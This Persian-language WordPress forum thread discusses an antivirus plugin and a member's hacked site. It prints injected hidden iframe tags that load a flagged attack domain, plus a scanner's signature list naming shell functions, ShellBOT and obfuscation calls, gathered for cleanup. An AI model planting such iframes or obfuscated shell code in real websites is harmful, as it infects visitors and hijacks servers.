سلام, دوستان سایتم فعلا غیر فعاله! دیگه مجبور شدم, افزونه رو اینجا بزارم :-(
قبلا naghies در موردش توضیح داده دیگه من توضیح نمیدم :D
لینک دانلود
سلام, دوستان سایتم فعلا غیر فعاله! دیگه مجبور شدم, افزونه رو اینجا بزارم :-(
قبلا naghies در موردش توضیح داده دیگه من توضیح نمیدم :D
لینک دانلود
اینا رو لطفن بعدن توی یه تاپیک مجزا قرار بده که دیگه همه بدونن برای افزونههای فارسی به کجا مراجعه کنن :-)
جدیداً مثل اینکه یه تروجان تو کدهای وردپرسم جاخوش کرده. این آنتی ویروسها میتونن اونو از بین ببرن؟ کلاً راه حل امنیتی اینکه وردپرس دچار ویروس نشه چیه؟ :?
نه باید خودتون از ببین ببریدش
افزونه فقط بهتون اطلاع مید
بله : http://www.wpantivirus.com
خوب من الآن دیدم که هوار تا کد مخرب تو فایلهام دارم
iframe src" iframes can sometimes be used by hackers to load their own adverts and code on your site.
که فقط یکیش اینه
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
<iframe src="http://jL.chura.pl/rc/" style="display:none"></iframe>
<iframe src="h
برای رفع اینها چکار باید بکنم. Akismet میتونه جلو این ویروسها رو بگیره؟
اول اينكه آي فريم براي تبليغات هم خوب ميتونه استفاده بشه كه ممكنه به اونها حساس باشه ، البته با دستور دومي كه شما داديد و بررسي لينك موجود ( دستي چك كنيد ) ، اين كد به پيوند داده شده متصل ميشه كه لينك مورد نظر مخرب هست. سنتي :-) حذفش كنيد.
Reported Attack Site!
This web site at jl.chura.pl has been reported as an attack site and has been blocked based on your security preferences.
خیلی زیادن :-( اگه از نو وردپرس رو نصب کنم از بین میرن؟ اینها از تو کامپیوتر من وارد شدن؟ چه جوری میرن لای کدهای دیگه؟ :?
من دوباره وردپرس رو نصب کردم. ویروسها خیلی کم شدن و فقط موندن اینها :?. اینها رو ویروس یاب به صورت رنگ زرد نشون داده
String.fromCharCode
iframe src
ShellBOT
uname -a
shell_exec
YW55cmVzdWx0cy5uZXQ=
<u style='display:none'>
eval(unescape
$_COOKIE["yahg"]
مثلاً این نمونه کدی هست که توش او بخش قرار داره:
home/mortabet/public_html/wp-includes/js/scriptaculous/prototype.js
return this.slice(0, this.length - 1) +
String.fromCharCode(this.charCodeAt(this.length - 1) + 1);
},
times: function(count) {
return count < 1 ? '' : new Array(count + 1).join(this);
},
camelize: function() {
var parts = this.split('-'), len = parts.length;
if (len =
خوب تایپیک قدیمی هست ولی نیازی نیست من دوبااره از ال توضیح بدم و بگم چی شده . خلاصه افزونه ی anti virus رو نصب کردم و به تعداد زیاد خطا داد با رنگ قرمز و به یه سری از توابع مشکوک شده بود :
bstr(file_get_contents(__FILE__),strripos(file_get_contents(__FI
به تابع :
file_get_contents
گیر داده بود .
یا به
fopen
یه جایی گیر داده بود ولی من از چند تا ترسیدم گویا مخرب باشن :
DQoJCTxwIGNsYXNzPSJhbm5vdGF0aW9uIj7Yt9ix2KfYrdmKINi02K
و
ZhyDYqtmI2LPYtyA8YSBocmVmPSJodHRwOi8vd3d3LnBhZGRzb2x1dGlvbnMuY29tLyIgdGl0bGU9IlBhZGRTb2x1dGlvbnMiPlBhZGRTb2x1dGlvbnM8L2E
و
ZhyDYqNmHINmB2KfYsdiz2Yog2KrZiNiz2LcgPGEgaHJlZj0iaHR0cDovL3RoZW16LmlyLyIgdGl0bGU9Itiq2LHYrNmF2Ycg2Ygg2YjZitix2KfZiti0INm
و ..... این آخریا شاید کد مخرب باشن یا اینکه به خاطر انکود بودن بهشون گیر داده .
اگه دوستان اطلاعی داره لطف کنه راهنمایی کنه .
احتمالا تابع fopen یک فایلی رو باز میکنه که محتویاتش اون رشتهها باشن! بررسی کن ببین توی سورس با چه الگوریتمی code میشه.
احتمالا تابع fopen یک فایلی رو باز میکنه که محتویاتش اون رشتهها باشن!
بررسی میکردم ظاهرا هیچ فایلی رو باز نمیکرد .
بررسی کن ببین توی سورس با چه الگوریتمی code میشه.
کل کد :
<?php $str ='CQk8L3A+DQoJCTxwIGNsYXNzPSJhbm5vdGF0aW9uIj7Yt9ix2KfYrdmKINi02K/ZhyDYqtmI2LPYtyA8YSBocmVmPSJodHRwOi8vd3d3LnBhZGRzb2x1dGlvbnMuY29tLyIgdGl0bGU9IlBhZGRTb2x1dGlvbnMiPlBhZGRTb2x1dGlvbnM8L2E+IHwg2KjYsdqv2LHYr9in2YbYr9mHINi02K/ZhyDYqNmHINmB2KfYsdiz2Yog2KrZiNiz2LcgPGEgaHJlZj0iaHR0cDovL3RoZW16LmlyLyIgdGl0bGU9Itiq2LHYrNmF2Ycg2Ygg2YjZitix2KfZiti0INm+2YjYs9iq2Ycg2YfYp9mKINmI2LHYr9m+2LHYs9iMINmB2LHZiNi02q/Yp9mHINm+2YjYs9iq2YfigIzZh9in24wg2YjYsdiv2b7YsdizIj7YqtmF2LI8L2E+PC9wPg0KCQk8ZGl2IGNsYXNzPSJjbGVhciI+PC9kaXY+DQoJPC9kaXY+';echo base64_decode($str);?>
ممنون .
سلام
لینک خرابه دوباره آپلودش کنید :(